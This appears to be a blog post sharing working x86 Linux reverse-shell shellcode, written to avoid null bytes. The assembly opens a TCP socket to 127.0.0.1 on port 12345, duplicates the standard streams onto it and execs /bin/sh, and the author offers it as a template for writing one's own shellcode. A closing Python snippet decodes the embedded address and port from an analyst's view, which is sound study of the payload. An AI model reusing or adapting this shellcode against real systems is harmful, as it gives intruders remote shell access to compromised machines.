Writing shellcode is hard: documented references are scarce, and figuring out how to translate function calls into assembly is a pain. I'm posting here a shellcode I wrote a while back. It's not a perfect example (it could be shorter and more elegant), but it works and contains no null bytes. It should get you started if you need help writing your own variety of shellcode.
This is a reverse shell: it connects back to 127.0.0.1 on port 12345, hoping to find a listening server there, and provides it with a shell.
```asm
# x86 linux reverse shellcode example
# aviran.org
# Assumption: GAS Intel syntax (assemble with `as --32`), hence the '#' comments.
.intel_syntax noprefix
.globl _start
_start:
    xor eax, eax        # setting eax, ebx, edx to zero
    xor ebx, ebx
    xor edx, edx
    push 0x6            # pushing 6, 1, 2 to the stack:
    push 0x1            # these are the values for
    push 0x2            # socket(2, 1, 6) = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
    mov ecx, esp        # set args for call
    mov bl, 1           # 1 means socket()
    mov al, 0x66        # 0x66 means sys_socketcall
    int 0x80            # call socket()
    mov esi, eax        # sockfd
    xor ebx, ebx        # ebx = 0
    xor ecx, ecx        # ecx = 0
    xor edx, edx        # edx = 0
    mov al, 0x66        # socket syscalls (sys_socketcall again)
    push ebx            # padding (becomes sin_zero of the struct)
    push ebx            # padding
    mov bl, 0x3         # ebx = 3 = connect()
    mov dl, 0x1         # pushing sockaddr_in into memory
    shl edx, 24         # IP, port, AF_INET; can't push a word, so port and AF_INET are pushed together
    mov dl, 0x7f        # setting edx to 0x0100007f - 127.0.0.1
    push edx
    xor edx, edx        # setting edx to 0x39300002 - port 12345, AF_INET
    mov dx, 0x3930      # this is done to avoid null bytes
    shl edx, 16
    mov dl, 0x2
    push edx
    mov ecx, esp        # saving location of struct
    # args for connect
    push 0x10           # 0x10 = size of struct
    push ecx            # ecx - pointer to struct
    push esi            # esi - sockfd
    mov ecx, esp
    int 0x80            # call connect()
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    mov ebx, esi        # sockfd
    mov al, 0x3f        # dup2
    mov cl, 0x2         # ecx = 2 = stderr
    int 0x80            # call dup2()
    xor eax, eax
    mov al, 0x3f
    dec cl              # cl = 1 = stdout
    int 0x80            # call dup2()
    xor eax, eax
    mov al, 0x3f
    dec cl              # cl = 0 = stdin
    int 0x80            # call dup2()
    xor eax, eax
    xor ecx, ecx
    xor edx, edx
    mov al, 11          # execve
    push edx            # push 0 for end of string
    push 0x68732f6e     # pushing //bin/sh
    push 0x69622f2f
    mov ebx, esp        # pointer to string
    push edx            # push null
    mov edx, esp        # edx is the third argument (envp), gets null
    push ebx            # push var to stack
    mov ecx, esp        # set second argument (argv)
    int 0x80            # make the call
```
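Whoever ends up reading this shellcode in a disassembly will first want to know where it calls home. Here is a small Python decoder (an added example, not code from the original post) that lays the two pushed dwords out in stack order, parses the sockaddr_in they form, and checks why both had to be built with shifts rather than pushed as immediates; the two constants are copied from the listing above.

```python
import socket
import struct

# The two dwords the shellcode builds in edx and pushes, as an analyst would
# read them off a disassembly (taken from the listing above, not captured data).
IP_DWORD = 0x0100007F           # pushed first, so it lands at the higher address
PORT_FAMILY_DWORD = 0x39300002  # pushed second, so it starts the struct


def stack_image(*dwords_in_push_order):
    """Bytes as they sit in memory after a series of 32-bit pushes.

    Each push stores its dword little-endian just below the previous one,
    so the last value pushed is the first one in the resulting buffer.
    """
    return b"".join(struct.pack("<I", d) for d in reversed(dwords_in_push_order))


def decode_sockaddr_in(buf):
    """Parse the first 8 bytes of a sockaddr_in.

    sin_family is in host (little-endian) order; sin_port and sin_addr are
    in network (big-endian) order, which is why 12345 shows up as 0x3039.
    """
    (family,) = struct.unpack("<H", buf[0:2])
    (port,) = struct.unpack("!H", buf[2:4])
    ip = socket.inet_ntoa(buf[4:8])
    return family, ip, port


def immediate_has_null(value):
    """True if pushing this dword as an immediate would embed a 0x00 byte."""
    return b"\x00" in struct.pack("<I", value)


def analyse(ip_dword=IP_DWORD, port_family_dword=PORT_FAMILY_DWORD):
    """Recover the callback target and explain the shift-based construction."""
    family, ip, port = decode_sockaddr_in(stack_image(ip_dword, port_family_dword))
    return {
        "family": family,
        "is_af_inet": family == socket.AF_INET,
        "ip": ip,
        "port": port,
        # both dwords contain 0x00 bytes, so neither could be pushed as an
        # immediate without breaking the "no null bytes" property
        "needs_shift_trick": immediate_has_null(ip_dword)
        or immediate_has_null(port_family_dword),
    }
```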